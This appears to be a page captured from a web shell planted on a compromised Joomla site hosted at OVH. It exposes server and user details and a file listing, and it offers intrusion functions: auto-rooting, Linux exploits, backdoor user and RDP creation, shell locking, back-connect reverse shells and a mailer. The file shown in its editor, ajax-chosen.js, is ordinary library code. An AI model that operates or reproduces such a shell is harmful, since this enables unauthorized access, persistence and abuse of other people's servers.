Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
media /
jui /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
ajax-chosen.js
4.37
KB
-rw-r--r--
ajax-chosen.min.js
2.75
KB
-rw-r--r--
bootstrap-tooltip-extended.js
5.76
KB
-rw-r--r--
bootstrap-tooltip-extended.min...
2.42
KB
-rw-r--r--
bootstrap.js
62.68
KB
-rw-r--r--
bootstrap.min.js
28.44
KB
-rw-r--r--
chosen.jquery.js
46.64
KB
-rw----r--
chosen.jquery.min.js
33.21
KB
-rw----r--
cms-uncompressed.js
7.54
KB
-rw----r--
cms.js
2.1
KB
-rw----r--
fielduser.js
3.99
KB
-rw----r--
fielduser.min.js
2.3
KB
-rw----r--
html5-uncompressed.js
10.09
KB
-rw-r--r--
html5.js
2.67
KB
-rw-r--r--
icomoon-lte-ie7.js
9.64
KB
-rw-r--r--
jquery-migrate.js
22.95
KB
-rw-r--r--
jquery-migrate.min.js
9.82
KB
-rw-r--r--
jquery-noconflict.js
21
B
-rw-r--r--
jquery.autocomplete.js
33.5
KB
-rw-r--r--
jquery.autocomplete.min.js
12.66
KB
-rw-r--r--
jquery.js
286.71
KB
-rw----r--
jquery.min.js
94.32
KB
-rw----r--
jquery.minicolors.js
40.27
KB
-rw-r--r--
jquery.minicolors.min.js
15.08
KB
-rw-r--r--
jquery.searchtools.js
10.54
KB
-rw-r--r--
jquery.searchtools.min.js
7.4
KB
-rw-r--r--
jquery.simplecolors.js
4.76
KB
-rw-r--r--
jquery.simplecolors.min.js
3.02
KB
-rw-r--r--
jquery.ui.core.js
43.73
KB
-rw-r--r--
jquery.ui.core.min.js
20.72
KB
-rw-r--r--
jquery.ui.sortable.js
39.51
KB
-rw-r--r--
jquery.ui.sortable.min.js
23.85
KB
-rw-r--r--
sortablelist.js
9.39
KB
-rw-r--r--
treeselectmenu.jquery.js
3.42
KB
-rw-r--r--
treeselectmenu.jquery.min.js
2.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ajax-chosen.js
// Generated by CoffeeScript 1.4.0 /* USING JOOMLA.JTEXT TO TRANSLATE LANGUAGE STRINGS * ================================================= */ (function($) { return $.fn.ajaxChosen = function(settings, callback, chosenOptions) { var chosenXhr, defaultOptions, options, select; if (settings == null) { settings = {}; } if (callback == null) { callback = {}; } if (chosenOptions == null) { chosenOptions = function() {}; } defaultOptions = { minTermLength: 3, afterTypeDelay: 500, jsonTermKey: "term", keepTypingMsg: Joomla.JText._('JGLOBAL_KEEP_TYPING'), lookingForMsg: Joomla.JText._('JGLOBAL_LOOKING_FOR') }; select = this; chosenXhr = null; options = $.extend({}, defaultOptions, $(select).data(), settings); this.chosen(chosenOptions ? chosenOptions : {}); return this.each(function() { return $(this).next('.chzn-container').find(".search-field > input, .chzn-search > input").bind('keyup', function() { var field, msg, success, untrimmed_val, val; untrimmed_val = $(this).val(); val = $.trim($(this).val()); msg = val.length < options.minTermLength ? options.keepTypingMsg : options.lookingForMsg + (" '" + val + "'"); select.next('.chzn-container').find('.no-results').text(msg); if (val === $(this).data('prevVal')) { return false; } $(this).data('prevVal', val); if (this.timer) { clearTimeout(this.timer); } if (val.length < options.minTermLength) { return false; } field = $(this); if (!(options.data != null)) { options.data = {}; } options.data[options.jsonTermKey] = val; if (options.dataCallback != null) { options.data = options.dataCallback(options.data); } success = options.success; options.success = function(data) { var items, nbItems, selected_values; if (!(data != null)) { return; } selected_values = []; select.find('option').each(function() { if (!$(this).is(":selected")) { return $(this).remove(); } else { return selected_values.push($(this).val() + "-" + $(this).text()); } }); select.find('optgroup:empty').each(function() { return $(this).remove(); }); items = callback(data); nbItems = 0; $.each(items, function(i, element) { var group, text, value; nbItems++; if (element.group) { group = select.find("optgroup[label='" + element.text + "']"); if (!group.size()) { group = $("<optgroup />"); } group.attr('label', element.text).appendTo(select); return $.each(element.items, function(i, element) { var text, value; if (typeof element === "string") { value = i; text = element; } else { value = element.value; text = element.text; } if ($.inArray(value + "-" + text, selected_values) === -1) { return $("<option />").attr('value', value).html(text).appendTo(group); } }); } else { if (typeof element === "string") { value = i; text = element; } else { value = element.value; text = element.text; } if ($.inArray(value + "-" + text, selected_values) === -1) { return $("<option />").attr('value', value).html(text).appendTo(select); } } }); if (nbItems) { select.trigger("liszt:updated"); } else { select.data().chosen.no_results_clear(); select.data().chosen.no_results(field.val()); } if (success != null) { success(data); } return field.val(untrimmed_val); }; return this.timer = setTimeout(function() { if (chosenXhr) { chosenXhr.abort(); } return chosenXhr = $.ajax(options); }, options.afterTypeDelay); }); }); }; })(jQuery);
Close